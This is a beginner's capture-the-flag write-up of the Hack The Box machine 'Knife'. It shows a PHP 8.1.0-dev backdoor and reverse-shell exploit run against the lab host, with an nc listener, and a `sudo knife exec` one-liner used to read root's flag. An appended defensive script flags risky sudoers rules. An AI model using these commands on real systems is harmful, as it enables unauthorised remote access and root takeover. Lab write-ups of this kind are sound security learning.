HTB — Knife
Abstract
- Assessing HTTP requests
- Exploit PHP 8.1.0-dev to get a backdoor and reverse shell
- Exploit knife to issue OS commands as root
Introduction
Hi people! In this post, I will be talking about my first ever “not-cheating” machine takeover including the “cheating” and the “not-cheating” one (haha, yikes).
This machine is rated as easy; however, it taught me a lot as a beginner and I am looking forward to trying the other machine takeovers.
Reconnaissance/Information gathering
First of all, we need to perform an Nmap scan. I use the following command:
nmap -A -v 10.10.10.242
Legend:
-A : enables several scans at once (version detection, OS detection, script scan), pretty much the basic things you need.
-v : verbose, displays more detailed output.
From the Nmap scan, we can see that 2 ports are open: 22 and 80.
To be very honest, there is not much valuable information to work with, so let’s just access them. Port 22, which is SSH, needs a user name and password, and we do not have those (assuming brute force is not an option). Port 80 is a web application, so we can try to access that.
As usual, I dig into the page source, looking for any meaningful JS and HTML comments, and find nothing (this usually takes some time). Since we did not find anything interesting, we go back to our first recon; maybe we can find something there.
Something interesting shows up on port 80: the HTTP methods. There is 1 method, OPTIONS, that I want to try since it is not common for me. You can read more about the OPTIONS method here.
Since this is related to HTTP methods, I try to curl it.
curl -X OPTIONS http://10.10.10.242 -i
The capital -X sets the HTTP method.
It returns the source code of the page along with its response headers.
There is interesting information in the X-Powered-By header:
PHP/8.1.0-dev
Now let’s try to research.
From Google search results, we can figure out that PHP 8.1.0-dev is vulnerable to remote code execution (RCE). It is also good practice to look at searchsploit. However, in this case, Google’s result is more reliable and clear.
After a while of searching and digging, I finally find the right tools. You can download them here.
Execution
I start with reading the readme document.
From this documentation and my humble understanding, 2 scripts should be executed. The backdoor file is required to upload the backdoor, and the revshell file is used to create the reverse shell that lets us communicate with the compromised server.
Some commands that I try:
1. whoami --> james
2. ls home/james (because the flag is usually here) --> user.txt
3. cat home/james/user.txt --> [user flag]
4. sudo -l (to know any sudo commands available for james) -->
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
So we know that the knife command can be run as root without a password.
Knife
So, I read some articles about privilege escalation, and most of them say almost the same thing: we need to find commands that can be executed as root, or processes running as root, that have vulnerabilities that provide privilege escalation. In this case, the knife command can be run as root. I try to research what the knife command can do, especially anything around executing OS commands.
Knife can execute an OS command by issuing:
sudo knife exec -E 'system("input your OS command")'
However, I find an error when executing it in the previous shell (through the backdoor exploit), so I try the second file, the reverse shell. In order to utilise the reverse shell, we need to prepare 3 things.
- Host/Target/Victim IP: We have that.
- Our IP address: Can be obtained from ifconfig -a.
- Our receiving/listening port: Can be opened by nc -nvlp your_port (nc -nvlp 4444). It will keep listening and waiting for connection.
Then we can execute the exploit:
python3 revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.16.5 4444
Note: You need to use 2 terminals: one for executing the exploit ("first terminal") and one for listening and interacting with the incoming connection ("second terminal").
After executing the exploit, look at the second terminal: we can interact with the system, similar to the previous shell. Then, we can execute our knife command.
sudo knife exec -E 'system("cat /root/root.txt")'
And then we get the root flag.
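The root flag falls out of the sudoers rule seen in the sudo -l output: a NOPASSWD root entry for a program that can run arbitrary commands. As an added example (not part of the original post), this Python script parses sudo -l output and flags such rules; the EXEC_CAPABLE list and the function names are illustrative assumptions, and the sample text is the post's output with indentation restored.

```python
import re

# Assumption (illustrative, not exhaustive): programs able to run arbitrary commands.
EXEC_CAPABLE = {"knife", "vim", "find", "perl", "python3", "ruby", "awk", "env", "bash", "sh"}

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")  # "(root) NOPASSWD: /usr/bin/knife"
TAG_RE = re.compile(r"^([A-Z_]+):\s*")                             # "NOPASSWD: ", "PASSWD: ", ...

# sudo -l output from the post (indentation restored).
SAMPLE = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
"""

def parse_sudo_l(text):
    """Return (runas_user, nopasswd, command) tuples from `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()
        nopasswd = False  # a tag carries over to later commands on the same line
        for part in map(str.strip, m.group("cmds").split(",")):
            while (t := TAG_RE.match(part)):
                if t.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = t.group(1) == "NOPASSWD"
                part = part[t.end():]
            if part:
                rules.append((runas, nopasswd, part))
    return rules

def risky_rules(text):
    """Flag root-capable rules whose program can spawn arbitrary commands."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(text):
        name = cmd.split()[0].rsplit("/", 1)[-1]  # basename of the program, or "ALL"
        if runas in ("root", "ALL") and (name == "ALL" or name in EXEC_CAPABLE):
            findings.append(("high" if nopasswd else "medium", runas, cmd))
    return findings

if __name__ == "__main__":
    for severity, runas, cmd in risky_rules(SAMPLE):
        print(f"[{severity}] runs as {runas}: {cmd}")
```

On a host you administer, feed it the output of sudo -l -U for each account. A sudoers entry that names a fixed knife subcommand with fixed arguments, instead of the bare binary, does not allow knife exec.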
Notes
I do not have to perform the OPTIONS curl since it can be obtained in the browser.
I do not actually know the difference between the Python exploits, so it might be an incorrect explanation (sorry); however, I'm pretty sure it works.